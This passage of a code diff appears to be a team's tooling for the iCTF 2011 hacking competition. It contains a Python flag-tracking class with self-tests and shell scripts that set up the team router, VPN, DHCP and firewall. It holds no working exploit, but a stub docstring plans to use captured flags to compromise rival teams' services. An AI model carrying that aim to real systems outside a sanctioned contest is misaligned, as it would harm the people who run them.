None + new_dict['tick_callback'] = None + new_dict['flag_dissipater_instance'] = None + + return new_dict + + def backup(self, filename='ictf2011.backup'): + pickle.dump(self, open(filename, 'w')) + + @staticmethod + def load(filename='ictf2011.backup'): + return pickle.load(open(filename)) + + def stop_flag_dissipater(self): + if self.flag_dissipater_instance: + self.flag_dissipater_instance.stop = True + + def start_flag_dissipater(self): + if not self.flag_dissipater_instance: + return + + class flag_dissipater(threading.Thread): + stop = False + cutoff = 0.75 + + def run(self): + '''Runs until stop is set to True + Will "sell" all flags with expectancy over cutoff and use + all others to compromise other people services + TODO''' + while not stop: + time.sleep(30) + # TODO + print 'foo' + + self.flag_dissipater_instance = flag_dissipater() + self.flag_dissipater_instance.start() + +def client(ip, port, messages): + '''Just for debugging and testing purposes''' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((ip, port)) + try: + for message in messages: + sock.send(message) + finally: + sock.close() + +if __name__ == '__main__': + ctf = ictf() + ip, port = ctf.start_state_receiver() + + # Run test data through here! + client(ip, port, '{"services": {"S1": {"P": 58, "C": 3, "R": 10}, "foobar": {"P": 98, "C": 42, "R": 90}, "hogwarts": {"P": 60, "C": 10, "R": 5}}, "tick": 666, "teams": {"A-team": {"subnet": "127.0.0.0/24", "D": 70, "services_compromised_last_tick": ["foobar", "S1"], "money": 395, "N": { "Justice League" : 600 }, "Q": {"S1": 10, "foobar": 10000}, "points": 394, "services_up_last_tick": ["S1", "foobar", "hogwarts"], "challenges_solved": [10, 971, 424242]}, "Justice League": {"subnet": "10.230.230.0/24", "D": 30, "services_compromised_last_tick": ["hogwarts"], "money": 3859, "N": { "foobar" : 6093 }, "Q": {"hogwarts": 1093, "foobar": 10000}, "points": 10293, "services_up_last_tick": ["hogwarts"], "challenges_solved": [30, 5391, 305]}}}'+ \ + "\nIf you can read this on your console, that is good :) (test passed)") + + time.sleep(1) + t = ctf.teams['Justice League'] + assert t['svc_comp'] == ['hogwarts'], 'Justice League.svc_comp not received' + assert t['svc_up'] == ['hogwarts'], 'Justice League.svc_up not received' + assert t['points'] == 10293, 'Justice League.points not received' + assert t['money'] == 3859, 'Justice League.money not received' + assert t['N']['foobar'] == 6093, 'Justice League.N not received' + + s = ctf.services['foobar'] + assert s['C'] == 42/100.0, 'foobar.C not received' + assert s['P'] == 98/100.0, 'foobar.P not received' + assert s['R'] == 90/100.0, 'foobar.R not received' + + ctf.start_flag_receiver() + time.sleep(1) + ip, port = ctf.recv_flag_server['ip'], \ + ctf.recv_flag_server['port'] + client(ip, port, ["Justice League\n","foobar\n","ABCDEFGHIJKLMNOPQRSTUVWXYZ!\n"]) + client(ip, port, ["230\n","S1\n","ABCDEFGHIJKLFOOPQRSTUVWXYZ!\n"]) + client(ip, port, ["10.230.230.3\n","hogwarts\n","FOOBARGHIJKLMNOPQRSTUVWXYZ!\n", \ + "!!BARFOOBAZ!!\n","BLUBBER!\n","BAR\n"]) + time.sleep(1) + assert 'FOO' in ctf.all_flags, 'Flag FOO not recognized' + assert 'BAR' in ctf.all_flags, 'Flag BAR not recognized' + assert 'BAZ' in ctf.all_flags, 'Flag BAZ not recognized' + assert len(ctf.unused_flags) == 3, 'Flags did not make it in unused_flags' + + ctf.stop_flag_receiver() + ctf.stop_state_receiver() + + ctf.backup() + new_ctf = ictf.load() + + assert new_ctf.get_risks(100) == ctf.get_risks(100), 'Dump and reload faulty' + assert new_ctf.get_payoffs(100) == ctf.get_payoffs(100), 'Dump and reload faulty' + del new_ctf + + ctf.print_scorboard() + ctf.print_risks(1000) + ctf.print_payoffs(1000) + ctf.print_expectancy(1000) + + print ctf.launder(100, ctf.get_flag('FOO',remove=True)) + assert None == ctf.get_flag('FOO'), 'get_flag(f, remove=True) failed' + assert 'FOO' == ctf.transactions[-1]['flag'], 'Transaction failed' + print ctf.betray(ctf.get_flag('BAR',remove=True)) + assert 'BAR' == ctf.transactions[-1]['flag'], 'Transaction failed' + + ctf.print_transactions() + + print 'ok' +\ No newline at end of file diff --git a/setup_firewall.sh b/setup_firewall.sh @@ -0,0 +1,6 @@ +#!/bin/bash +#setup firewall +iptables --append FORWARD --in-interface eth0 --out-interface tun0 -j DROP +iptables --append FORWARD --in-interface tun0 --out-interface eth0 -j DROP +iptables --append FORWARD -s 10.13.147.3 --out-interface eht0 -j DROP +iptables --append FORWARD --in-interface eth0 -d 10.13.147.3 -j DROP diff --git a/steps b/steps @@ -0,0 +1,53 @@ +#!/bin/bash + +#setup router with ubuntu +sudo su + +apt-get update +apt-get upgrade + +apt-get install openjdk-7-jre icedtea6-plugin python2.7 python2.7-dev python-scapy openvpn wireshark isc-dhcp-serve openssh-client openssh-server p7zip-full + + +#Enable forwarding +comment1="#net.ipv4.ip_forward=1" +file1="/etc/sysctl.conf" +sed -i "/"${comment1}"/ s/# *//" $file1 +sysctl -p + +# enable NAT & put it in /etc/rc.local to run it automatically during boot. +iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +echo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE >> /etc/rc.local + +#setup vpn files "sudo openvpn --config client.cfg" +openvpn --config vpn/client.cfg + +#start ssh +/etc/init.d/\ssh start + +#Setup DHCP +echo subnet 10.13.147.0 netmask 255.255.255.0 \{ >> /etc/dhcp/dhcpd.conf +echo range 10.13.147.10 10.13.147.99\; >> /etc/dhcp/dhcpd.conf +echo option routers 10.13.147.1\; >> /etc/dhcp/dhcpd.conf +echo \} >> /etc/dhcp/dhcpd.conf + +/etc/init.d/isc-dhcp-server restart + +#Set the IP of each team's workstation taking out one from 10.13.147.0/24 pool. +#Set the 10.13.147.1 as a gateway. +#Set the 10.13.147.3 as a vuln vm. + +#setup vm +wget http://download.virtualbox.org/virtualbox/4.1.6/virtualbox-4.1_4.1.6-74713~Ubuntu~oneiric_amd64.deb +dpkg -i virtualbox-4.1_4.1.6-74713~Ubuntu~oneiric_amd64.deb +# vm is in vm/ folder +#in VM +# set passwd of user +# set static ip 10.13.147.3/24 +# gw 10.13.147.1 + +#setup firewall +iptables --append FORWARD --in-interface eth0 --out-interface tun0 -j DROP +iptables --append FORWARD --in-interface tun0 --out-interface eth0 -j DROP +iptables --append FORWARD -s 10.13.147.3 --out-interface eht0 -j DROP +iptables --append FORWARD --in-interface eth0 -d 10.13.147.3 -j DROP diff --git a/update.sh b/update.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +#setup router with ubuntu +sudo su + +apt-get update +apt-get upgrade + +apt-get install openjdk-7-jre icedtea6-plugin python2.7 python2.7-dev python-scapy openvpn wireshark isc-dhcp-serve openssh-client openssh-server p7zip-full